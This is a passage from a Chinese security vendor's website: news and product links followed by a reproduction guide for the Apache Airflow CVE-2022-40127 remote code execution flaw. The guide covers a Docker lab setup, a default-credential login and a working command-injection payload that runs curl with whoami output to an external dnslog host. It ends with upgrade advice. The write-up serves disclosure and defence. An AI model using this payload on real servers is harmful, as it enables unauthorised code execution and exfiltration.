2025中国互联网产业年会丨《中国互联网产业绿色算力发展倡议》正式发布
2025-02-07
美创用户专访 | 精细化管理:医疗行业数据分类分级的策略与实践
2025-01-10
容灾演练双月报|美创助力某特大型通信基础设施央企顺利完成多个核心系统异地容灾演练
2025-01-10
国家级|美创、徐医附院共建项目入选工信部《2024年网络安全技术应用典型案例拟支持项目名单》
2024-12-20
全球数据跨境流动合作倡议
2024-11-22
存储域
数据库加密 诺亚防勒索访问域
数据库防水坝 数据库防火墙 数据库安全审计 动态脱敏流动域
静态脱敏 数据水印 API安全 API审计 医疗防统方运维服务
数据库运维服务 中间件运维服务 国产信创改造服务 驻场运维服务 供数服务安全咨询服务
数据出境安全治理服务 数据安全能力评估认证服务 数据安全风险评估服务 数据安全治理咨询服务 数据分类分级咨询服务 个人信息风险评估服务 数据安全检查服务Airflow是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),airflow可以定义一组有依赖的任务,按照依赖依次执行。Apache Airflow的某些版本存在远程代码执行漏洞,如攻击者获取到Apache Airflow后台权限,则可在Apache Airflow应用服务器上执行任意代码。
Apache Airflow < 2.4.0
可根据
https://github.com/Mr-xn/CVE-2022-40127
进行环境搭建
如图所示,执行
mkdir CVE-2022-40127 && cd CVE-2022-40127
创建漏洞环境目录
执行
wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yaml
拉取漏洞dockr环境文件
执行
mkdir -p ./dags ./logs ./plugins
创建目录
执行
echo -e "AIRFLOW_UID=$(id -u)" > .env
创建环境变量
执行
docker-compose up airflow-init
拉取漏洞docker环境
执行
docker-compose up -d
运行漏洞docker环境
访问
http://ip:8080
出现以下页面代表环境创建成功
复现该漏洞需登录airflow应用
如图所示,通过airflow/airflow
登录应用
点击右小箭头再点击Trigger DAG w/ config
如图所示,访问
http://dnslog.cn/
点击Get SubDomain
获取到域名
2gbu0x.dnslog.cn
返回airflow应用页面,如图所示,在红框内输入POC
{"fxoxx":"\";curl `whoami`.2gbu0x.dnslog.cn;\""}
并点击Trigger
返回dnslog页面,点击Refresh Record即可成功获得代码命令结果
将Apache Airflow版本升级至大于2.4.0版本。